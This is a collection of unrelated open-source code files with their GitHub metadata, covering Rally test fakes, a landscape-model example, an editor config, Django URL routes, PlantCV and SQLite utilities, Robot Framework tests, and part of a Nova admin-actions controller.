CONFIG_SCHEMA = {
"type": "object",
"$schema": consts.JSON_SCHEMA,
"properties": {
"type": {
"type": "string",
"enum": ["fake"]
},
"a": {
"type": "string"
},
"b": {
"type": "number"
}
},
"required": ["type", "a"]
}
class FakeScenario(scenario.Scenario):
def idle_time(self):
return 0
def do_it(self, **kwargs):
pass
def with_output(self, **kwargs):
return {"data": {"a": 1}, "error": None}
def with_add_output(self):
self.add_output(additive={"title": "Additive",
"description": "Additive description",
"data": [["a", 1]],
"chart_plugin": "FooPlugin"},
complete={"title": "Complete",
"description": "Complete description",
"data": [["a", [[1, 2], [2, 3]]]],
"chart_plugin": "BarPlugin"})
def too_long(self, **kwargs):
pass
def something_went_wrong(self, **kwargs):
raise Exception("Something went wrong")
def raise_timeout(self, **kwargs):
raise multiprocessing.TimeoutError()
@scenario.configure(name="classbased.fooscenario")
class FakeClassBasedScenario(FakeScenario):
"""Fake class-based scenario."""
def run(self, *args, **kwargs):
pass
class FakeTimer(rally_utils.Timer):
def duration(self):
return 10
def timestamp(self):
return 0
def finish_timestamp(self):
return 3
@context.configure(name="fake", order=1)
class FakeContext(context.Context):
CONFIG_SCHEMA = {
"type": "object",
"$schema": consts.JSON_SCHEMA,
"properties": {
"test": {
"type": "integer"
},
},
"additionalProperties": False
}
def __init__(self, context_obj=None):
context_obj = context_obj or {}
context_obj.setdefault("config", {})
context_obj["config"].setdefault("fake", None)
context_obj.setdefault("task", mock.MagicMock())
super(FakeContext, self).__init__(context_obj)
def setup(self):
pass
def cleanup(self):
pass
@context.configure(name="fake_hidden_context", order=1, hidden=True)
class FakeHiddenContext(FakeContext):
pass
@context.configure(name="fake_user_context", order=1)
class FakeUserContext(FakeContext):
admin = {
"id": "adminuuid",
"credential": objects.Credential("aurl", "aname", "apwd", "atenant")
}
user = {
"id": "uuid",
"credential": objects.Credential("url", "name", "pwd", "tenant"),
"tenant_id": "uuid"
}
tenants = {"uuid": {"name": "tenant"}}
def __init__(self, ctx):
super(FakeUserContext, self).__init__(ctx)
self.context.setdefault("admin", FakeUserContext.admin)
self.context.setdefault("users", [FakeUserContext.user])
self.context.setdefault("tenants", FakeUserContext.tenants)
self.context.setdefault(
"scenario_name", "NovaServers.boot_server_from_volume_and_delete")
class FakeDeployment(dict):
update_status = mock.Mock()
class FakeTask(dict):
def __init__(self, task=None, temporary=False, **kwargs):
self.is_temporary = temporary
self.task = task or kwargs
self.set_failed = mock.Mock()
def __getitem__(self, key):
if key in self:
return self[key]
return self.task[key]
def to_dict(self):
return self
| {
"content_hash": "49139e13c4e0eb3abadc32352b057aa1",
"timestamp": "",
"source": "github",
"line_count": 1799,
"max_line_length": 81,
"avg_line_length": 29.5964424680378,
"alnum_prop": 0.5903012546014574,
"repo_name": "vganapath/rally",
"id": "4c195b6c01a0720bc4ad2cb59105ac220dc96fd2",
"size": "53874",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/fakes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "52008"
},
{
"name": "JavaScript",
"bytes": "8550"
},
{
"name": "Mako",
"bytes": "18645"
},
{
"name": "Python",
"bytes": "3621510"
},
{
"name": "Shell",
"bytes": "43808"
}
],
"symlink_target": ""
} |
"""
Hillslope & uplift example case for PY_ICE_CASCADE landscape evolution model
"""
import py_ice_cascade
import numpy as np
def run_example():
"""
Run hillslope diffusion with uplift example, save results to file, and
return output file name
"""
ny = 50
nx = 100
lx = 1.0
delta = lx/(nx-1)
ly = delta*(ny-1)
x = np.linspace(0, lx, nx)
y = np.linspace(0, ly, ny)
zrx = np.pad(np.random.rand(ny-2, nx-2), 1, 'constant', constant_values=0)
time_start = 0.0
time_step = 0.1
num_steps = 10
time_end = time_start + time_step*(num_steps-1)
out_steps = np.arange(0,num_steps)
hill_mask = np.ones((ny, nx))
hill_kappa_active = 0.01
hill_kappa_inactive = 0.0
hill_bc = ['constant']*4
uplift_start = np.zeros((ny,nx), dtype=np.double)
uplift_end = np.ones((ny,nx), dtype=np.double)
output_filename = 'example.hill_uplift.out.nc'
hill = py_ice_cascade.hillslope.ftcs_model(zrx, hill_mask, delta, hill_kappa_active,
hill_kappa_inactive, hill_bc)
uplift = py_ice_cascade.uplift.linear_model(zrx, uplift_start, uplift_end, time_start, time_end)
mod = py_ice_cascade.main_model(hill, uplift,
x, y, zrx, time_start, time_step, num_steps, out_steps)
mod.run(output_filename, clobber=True)
return output_filename
if __name__ == '__main__':
run_example()
| {
"content_hash": "73169e9f2694aec34ac80f4f7a7c4664",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 100,
"avg_line_length": 29.425531914893618,
"alnum_prop": 0.6290672451193059,
"repo_name": "keithfma/py_ice_cascade",
"id": "c189062909a024372c067b413c91b37caf13ecf0",
"size": "1383",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py_ice_cascade/examples/hill_uplift.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "659"
},
{
"name": "Python",
"bytes": "58223"
}
],
"symlink_target": ""
} |
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
'-fexceptions',
'-DNDEBUG',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++11',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
'-isystem',
'/usr/include',
'-isystem',
'/usr/local/include',
'-isystem',
'/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/../lib/c++/v1',
'-isystem',
'/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/include',
'-I',
'/home/zrb/src/edk2/MdePkg/Include'
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
# This is the entry point; this function is called by ycmd to produce flags for
# a file.
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return { 'flags': final_flags }
| {
"content_hash": "56f42ef53e57d251e776d1964fbc9d97",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 103,
"avg_line_length": 33.265625,
"alnum_prop": 0.6930483795209018,
"repo_name": "RongbinZhuang/simpleOS",
"id": "189f2873dc7bf90eaf0e08ca2904e14a648802a6",
"size": "4935",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Alpha/.ycm_extra_conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "5124957"
},
{
"name": "Batchfile",
"bytes": "70"
},
{
"name": "C",
"bytes": "6937758"
},
{
"name": "C++",
"bytes": "6770687"
},
{
"name": "HTML",
"bytes": "7719"
},
{
"name": "Makefile",
"bytes": "242586"
},
{
"name": "Objective-C",
"bytes": "10667"
},
{
"name": "Python",
"bytes": "36815"
},
{
"name": "Roff",
"bytes": "4328"
},
{
"name": "Shell",
"bytes": "27093"
},
{
"name": "SourcePawn",
"bytes": "80688"
}
],
"symlink_target": ""
} |
from django.conf.urls.defaults import *
from django.conf import settings
from django.views.generic.simple import direct_to_template
from django.contrib import admin
from account.openid_consumer import PinaxConsumer
import os.path
from microblogging.feeds import TweetFeedAll, TweetFeedUser, TweetFeedUserWithFriends
tweets_feed_dict = {"feed_dict": {
'all': TweetFeedAll,
'only': TweetFeedUser,
'with_friends': TweetFeedUserWithFriends,
}}
from blog.feeds import BlogFeedAll, BlogFeedUser
blogs_feed_dict = {"feed_dict": {
'all': BlogFeedAll,
'only': BlogFeedUser,
}}
from bookmarks.feeds import BookmarkFeed
bookmarks_feed_dict = {"feed_dict": { '': BookmarkFeed }}
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', direct_to_template, {"template": "homepage.html"}, name="home"),
(r'^about/', include('about.urls')),
(r'^account/', include('account.urls')),
(r'^openid/(.*)', PinaxConsumer()),
(r'^bbauth/', include('bbauth.urls')),
(r'^authsub/', include('authsub.urls')),
(r'^profiles/', include('profiles.urls')),
(r'^blog/', include('blog.urls')),
(r'^tags/', include('tag_app.urls')),
(r'^invitations/', include('friends_app.urls')),
(r'^notices/', include('notification.urls')),
(r'^messages/', include('messages.urls')),
(r'^announcements/', include('announcements.urls')),
(r'^tweets/', include('microblogging.urls')),
(r'^tribes/', include('tribes.urls')),
(r'^projects/', include('projects.urls')),
(r'^comments/', include('threadedcomments.urls')),
(r'^robots.txt$', include('robots.urls')),
(r'^i18n/', include('django.conf.urls.i18n')),
(r'^bookmarks/', include('bookmarks.urls')),
(r'^admin/(.*)', admin.site.root),
(r'^photos/', include('photos.urls')),
(r'^avatar/', include('avatar.urls')),
(r'^swaps/', include('swaps.urls')),
(r'^flag/', include('flag.urls')),
(r'^schedule/', include('schedule.urls')),
(r'^locations/', include('locations.urls')),
(r'^feeds/tweets/(.*)/$', 'django.contrib.syndication.views.feed', tweets_feed_dict),
(r'^feeds/posts/(.*)/$', 'django.contrib.syndication.views.feed', blogs_feed_dict),
(r'^feeds/bookmarks/(.*)/?$', 'django.contrib.syndication.views.feed', bookmarks_feed_dict),
)
## @@@ for now, we'll use friends_app to glue this stuff together
from photos.models import Photo
friends_photos_kwargs = {
"template_name": "photos/friends_photos.html",
"friends_objects_function": lambda users: Photo.objects.filter(member__in=users),
}
from blog.models import Post
friends_blogs_kwargs = {
"template_name": "blog/friends_posts.html",
"friends_objects_function": lambda users: Post.objects.filter(author__in=users),
}
from microblogging.models import Tweet
friends_tweets_kwargs = {
"template_name": "microblogging/friends_tweets.html",
"friends_objects_function": lambda users: Tweet.objects.filter(sender_id__in=[user.id for user in users], sender_type__name='user'),
}
from bookmarks.models import Bookmark
friends_bookmarks_kwargs = {
"template_name": "bookmarks/friends_bookmarks.html",
"friends_objects_function": lambda users: Bookmark.objects.filter(saved_instances__user__in=users),
"extra_context": {
"user_bookmarks": lambda request: Bookmark.objects.filter(saved_instances__user=request.user),
},
}
urlpatterns += patterns('',
url('^photos/friends_photos/$', 'friends_app.views.friends_objects', kwargs=friends_photos_kwargs, name="friends_photos"),
url('^blog/friends_blogs/$', 'friends_app.views.friends_objects', kwargs=friends_blogs_kwargs, name="friends_blogs"),
url('^tweets/friends_tweets/$', 'friends_app.views.friends_objects', kwargs=friends_tweets_kwargs, name="friends_tweets"),
url('^bookmarks/friends_bookmarks/$', 'friends_app.views.friends_objects', kwargs=friends_bookmarks_kwargs, name="friends_bookmarks"),
)
if settings.SERVE_MEDIA:
urlpatterns += patterns('',
(r'^site_media/(?P<path>.*)$', 'misc.views.serve')
)
| {
"content_hash": "30e5b94e6e928f88722fedb991f408f4",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 138,
"avg_line_length": 38.27358490566038,
"alnum_prop": 0.6736504806507272,
"repo_name": "ingenieroariel/pinax",
"id": "b031d716fc8f8936af3af8d6db957424ca535034",
"size": "4057",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "projects/complete_project/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "3140"
},
{
"name": "Python",
"bytes": "520245"
}
],
"symlink_target": ""
} |
import numpy as np
from plantcv.plantcv import fatal_error
from plantcv.plantcv import outputs
def within_frame(mask, border_width=1, label="default"):
"""
This function tests whether the plant touches the edge of the image, i.e. it is completely in the field of view.
Input:
mask = a binary image of 0 and nonzero values
border_width = distance from border of image considered out of frame (default = 1)
label = optional label parameter, modifies the variable name of observations recorded
Returns:
in_bounds = a boolean (True or False) confirming that the object does not touch the edge of the image
:param mask: numpy.ndarray
:param border_width: int
:param label: str
:return in_bounds: bool
"""
# Check if object is touching image boundaries (QC)
if len(np.shape(mask)) > 2 or len(np.unique(mask)) > 2:
fatal_error("Mask should be a binary image of 0 and nonzero values.")
# First column
first_col = mask[:, range(0, border_width)]
# Last column
last_col = mask[:, range(-border_width, 0)]
# First row
first_row = mask[range(0, border_width), :]
# Last row
last_row = mask[range(-border_width, 0), :]
border_pxs = np.concatenate([first_col.flatten(), last_col.flatten(), first_row.flatten(), last_row.flatten()])
out_of_bounds = bool(np.count_nonzero(border_pxs))
in_bounds = not out_of_bounds
outputs.add_observation(sample=label, variable='in_bounds', trait='whether the plant goes out of bounds ',
method='plantcv.plantcv.within_frame', scale='none', datatype=bool,
value=in_bounds, label='none')
return in_bounds
| {
"content_hash": "75a33cf651611c0220ff677069966f21",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 116,
"avg_line_length": 36.702127659574465,
"alnum_prop": 0.6562318840579711,
"repo_name": "danforthcenter/plantcv",
"id": "74d2b638834e7bacd33387bf3ba4f1c9921a5b43",
"size": "1762",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "plantcv/plantcv/within_frame.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "1112"
},
{
"name": "Python",
"bytes": "898011"
},
{
"name": "R",
"bytes": "1327"
},
{
"name": "Shell",
"bytes": "3348"
}
],
"symlink_target": ""
} |
"""
The database table controller.
"""
import logging
from sqlite3 import Connection
from typing import Any, Mapping
from snippy.data.dbtypes import Table
from snippy.data.sqlgenerator import SqlGenerator
from snippy.data.sqlite import Sqlite
from snippy.utils.loggingtools import get_logger
class TableController:
"""Controls data access and manipulation for a given table.
:param db_conn: Database connection
:type db_conn: sqlite3.Connection
:param table: Database table
:type table: snippy.data.dbtypes.Table
"""
def __init__(self, db_conn: Connection, table: Table):
self._db_conn = db_conn
self._table = table
self._sql_gen = SqlGenerator(table)
self._logger = get_logger('tablecontroller', logging.DEBUG)
def create_table(self, clobber: bool=False):
"""Creates a table.
:param clobber: Flag indicating to overwrite existing table
:type clobber: bool
"""
if clobber:
sql = self._sql_gen.get_drop_table_sql()
Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Dropped table %s", self._table.name)
sql = self._sql_gen.get_create_table_sql()
Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Created table %s", self._table.name)
def insert_row(self, row: Mapping[str, Any]):
"""Inserts a row.
:param row: Table row
:type row: dict(str, [column datatype])
"""
sql = self._sql_gen.get_insert_row_sql()
Sqlite.execute_sql(self._db_conn, sql, row)
# TODO: get row id from insert
self._logger.info("Inserted row [...]")
def update_row(self, rowid: int, row: Mapping[str, Any]):
"""Updates a row.
:param rowid: Table row ID
:type rowid: int
:param row: Table row
:type row: dict(str, [column datatype])
"""
row['rowid'] = rowid
sql = self._sql_gen.get_update_row_sql()
Sqlite.execute_sql(self._db_conn, sql, row)
self._logger.info("Updated row %s", rowid)
def delete_row(self, rowid: int):
"""Deletes a row.
:param rowid: Table row ID
:type rowid: int
"""
sql = self._sql_gen.get_delete_row_sql()
Sqlite.execute_sql(self._db_conn, sql, {'rowid': rowid})
self._logger.info("Deleted row %s", rowid)
def delete_all_rows(self):
"""Deletes all rows."""
sql = self._sql_gen.get_delete_all_rows_sql()
Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Deleted all rows")
def query_all_rows(self):
"""Returns all rows."""
sql = self._sql_gen.get_query_all_rows_sql()
query_results = Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Queried all rows")
return query_results
def query_row_by_value(self, column_name: str, value: Any):
"""Returns all rows with a given column value.
:param column_name: Column name
:type column_name: str
:param value: Search value
:type value: [Column datatype]
"""
sql = self._sql_gen.get_query_row_by_value_sql(column_name, value)
query_results = Sqlite.execute_sql(self._db_conn, sql)
self._logger.info("Queried rows with %s = %s", column_name, value)
return query_results
# def table_exists(self, table_name):
# sql = ("SELECT name FROM sqlite_master "
# "WHERE type = 'table' AND name = 'table_name';")
# table_names = Sqlite.execute_sql(self._db_conn, sql)
# print table_names
# return table_name in table_names
| {
"content_hash": "53c16b7e946c6f2330ee04c94b507a7c",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 74,
"avg_line_length": 35.66981132075472,
"alnum_prop": 0.5879396984924623,
"repo_name": "pauljxtan/snippy",
"id": "e4c2a7fd708c5705bf7de014dfe7f8ac172828b3",
"size": "3781",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "snippy/logic/tablecontroller.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "36582"
}
],
"symlink_target": ""
} |
import unittest
from robot.reporting.jsexecutionresult import JsExecutionResult
from robot.reporting.jswriter import JsResultWriter
from robot.utils import StringIO
from robot.utils.asserts import assert_equal, assert_true
def get_lines(suite=(), strings=(), basemillis=100, start_block='',
end_block='', split_threshold=9999, min_level='INFO'):
output = StringIO()
data = JsExecutionResult(suite, None, None, strings, basemillis, min_level=min_level)
writer = JsResultWriter(output, start_block, end_block, split_threshold)
writer.write(data, settings={})
return output.getvalue().splitlines()
def assert_separators(lines, separator, end_separator=False):
for index, line in enumerate(lines):
if index % 2 == int(end_separator):
assert_equal(line, separator)
else:
assert_true(line.startswith('window.'), line)
class TestDataModelWrite(unittest.TestCase):
def test_writing_datamodel_elements(self):
lines = get_lines(min_level='DEBUG')
assert_true(lines[0].startswith('window.output = {}'), lines[0])
assert_true(lines[1].startswith('window.output["'), lines[1])
assert_true(lines[-1].startswith('window.settings ='), lines[-1])
def test_writing_datamodel_with_separator(self):
lines = get_lines(start_block='seppo\n')
assert_true(len(lines) >= 2)
assert_separators(lines, 'seppo')
def test_splitting_output_strings(self):
lines = get_lines(strings=['data' for _ in range(100)],
split_threshold=9, end_block='?\n')
parts = [l for l in lines if l.startswith('window.output["strings')]
assert_equal(len(parts), 13)
assert_equal(parts[0], 'window.output["strings"] = [];')
for line in parts[1:]:
assert_true(line.startswith('window.output["strings"] = window.output["strings"].concat(['), line)
assert_separators(lines, '?', end_separator=True)
class TestSuiteWriter(unittest.TestCase):
def test_no_splitting(self):
suite = (1, (2, 3), (4, (5,), (6, ())), 8)
expected = ['window.output["suite"] = [1,[2,3],[4,[5],[6,[]]],8];']
self._assert_splitting(suite, 100, expected)
def test_simple_splitting_version_1(self):
suite = ((1, 2, 3, 4), (5, 6, 7, 8), 9)
expected = ['window.sPart0 = [1,2,3,4];',
'window.sPart1 = [5,6,7,8];',
'window.output["suite"] = [window.sPart0,window.sPart1,9];']
self._assert_splitting(suite, 4, expected)
def test_simple_splitting_version_2(self):
suite = ((1, 2, 3, 4), (5, 6, 7, 8), 9, 10)
expected = ['window.sPart0 = [1,2,3,4];',
'window.sPart1 = [5,6,7,8];',
'window.sPart2 = [window.sPart0,window.sPart1,9,10];',
'window.output["suite"] = window.sPart2;']
self._assert_splitting(suite, 4, expected)
def test_simple_splitting_version_3(self):
suite = ((1, 2, 3, 4), (5, 6, 7, 8, 9, 10), 11)
expected = ['window.sPart0 = [1,2,3,4];',
'window.sPart1 = [5,6,7,8,9,10];',
'window.output["suite"] = [window.sPart0,window.sPart1,11];']
self._assert_splitting(suite, 4, expected)
def test_tuple_itself_has_size_one(self):
suite = ((1, (), (), 4), (((((),),),),))
expected = ['window.sPart0 = [1,[],[],4];',
'window.sPart1 = [[[[[]]]]];',
'window.output["suite"] = [window.sPart0,window.sPart1];']
self._assert_splitting(suite, 4, expected)
def test_nested_splitting(self):
suite = (1, (2, 3), (4, (5,), (6, 7)), 8)
expected = ['window.sPart0 = [2,3];',
'window.sPart1 = [6,7];',
'window.sPart2 = [4,[5],window.sPart1];',
'window.sPart3 = [1,window.sPart0,window.sPart2,8];',
'window.output["suite"] = window.sPart3;']
self._assert_splitting(suite, 2, expected)
def _assert_splitting(self, suite, threshold, expected):
lines = get_lines(suite, split_threshold=threshold, start_block='foo\n')
parts = [l for l in lines if l.startswith(('window.sPart',
'window.output["suite"]'))]
assert_equal(parts, expected)
assert_separators(lines, 'foo')
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "fdcbb23b014584dbda5439be299f2bfd",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 110,
"avg_line_length": 43.10576923076923,
"alnum_prop": 0.5670310060227526,
"repo_name": "jaloren/robotframework",
"id": "dc0a0393d22c6aec52ed68a5d1db35d2de178959",
"size": "4483",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "utest/reporting/test_jswriter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "245"
},
{
"name": "CSS",
"bytes": "23490"
},
{
"name": "HTML",
"bytes": "140926"
},
{
"name": "Java",
"bytes": "58264"
},
{
"name": "JavaScript",
"bytes": "160797"
},
{
"name": "Python",
"bytes": "2241544"
},
{
"name": "RobotFramework",
"bytes": "2074646"
},
{
"name": "Shell",
"bytes": "281"
}
],
"symlink_target": ""
} |
import traceback
from oslo_log import log as logging
from oslo_utils import strutils
import six
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova.compute import vm_states
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova import utils
LOG = logging.getLogger(__name__)
# States usable in resetState action
state_map = dict(active=vm_states.ACTIVE, error=vm_states.ERROR)
def authorize(context, action_name):
action = 'admin_actions:%s' % action_name
extensions.extension_authorizer('compute', action)(context)
class AdminActionsController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(AdminActionsController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
@wsgi.action('pause')
def _pause(self, req, id, body):
"""Permit Admins to pause the server."""
ctxt = req.environ['nova.context']
authorize(ctxt, 'pause')
server = common.get_instance(self.compute_api, ctxt, id)
try:
self.compute_api.pause(ctxt, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'pause', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::pause %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('unpause')
def _unpause(self, req, id, body):
"""Permit Admins to unpause the server."""
ctxt = req.environ['nova.context']
authorize(ctxt, 'unpause')
server = common.get_instance(self.compute_api, ctxt, id)
try:
self.compute_api.unpause(ctxt, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'unpause', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::unpause %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('suspend')
def _suspend(self, req, id, body):
"""Permit admins to suspend the server."""
context = req.environ['nova.context']
authorize(context, 'suspend')
server = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.suspend(context, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'suspend', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("compute.api::suspend %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('resume')
def _resume(self, req, id, body):
"""Permit admins to resume the server from suspend."""
context = req.environ['nova.context']
authorize(context, 'resume')
server = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.resume(context, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'resume', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("compute.api::resume %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('migrate')
def _migrate(self, req, id, body):
"""Permit admins to migrate a server to a new host."""
context = req.environ['nova.context']
authorize(context, 'migrate')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.resize(req.environ['nova.context'], instance)
except exception.QuotaError as error:
raise exc.HTTPForbidden(explanation=error.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'migrate', id)
except exception.InstanceNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.NoValidHost as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
except Exception:
LOG.exception(_LE("Error in migrate"))
raise exc.HTTPBadRequest()
return webob.Response(status_int=202)
@wsgi.action('resetNetwork')
def _reset_network(self, req, id, body):
"""Permit admins to reset networking on a server."""
context = req.environ['nova.context']
authorize(context, 'resetNetwork')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.reset_network(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::reset_network %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('injectNetworkInfo')
def _inject_network_info(self, req, id, body):
"""Permit admins to inject network info into a server."""
context = req.environ['nova.context']
authorize(context, 'injectNetworkInfo')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.inject_network_info(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::inject_network_info %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('lock')
def _lock(self, req, id, body):
"""Lock a server instance."""
context = req.environ['nova.context']
authorize(context, 'lock')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.lock(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::lock %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('unlock')
def _unlock(self, req, id, body):
"""Unlock a server instance."""
context = req.environ['nova.context']
authorize(context, 'unlock')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.unlock(context, instance)
except exception.PolicyNotAuthorized as e:
raise webob.exc.HTTPForbidden(explanation=e.format_message())
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::unlock %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('createBackup')
def _create_backup(self, req, id, body):
"""Backup a server instance.
Images now have an `image_type` associated with them, which can be
'snapshot' or the backup type, like 'daily' or 'weekly'.
If the image_type is backup-like, then the rotation factor can be
included and that will cause the oldest backups that exceed the
rotation factor to be deleted.
"""
context = req.environ["nova.context"]
authorize(context, 'createBackup')
entity = body["createBackup"]
try:
image_name = entity["name"]
backup_type = entity["backup_type"]
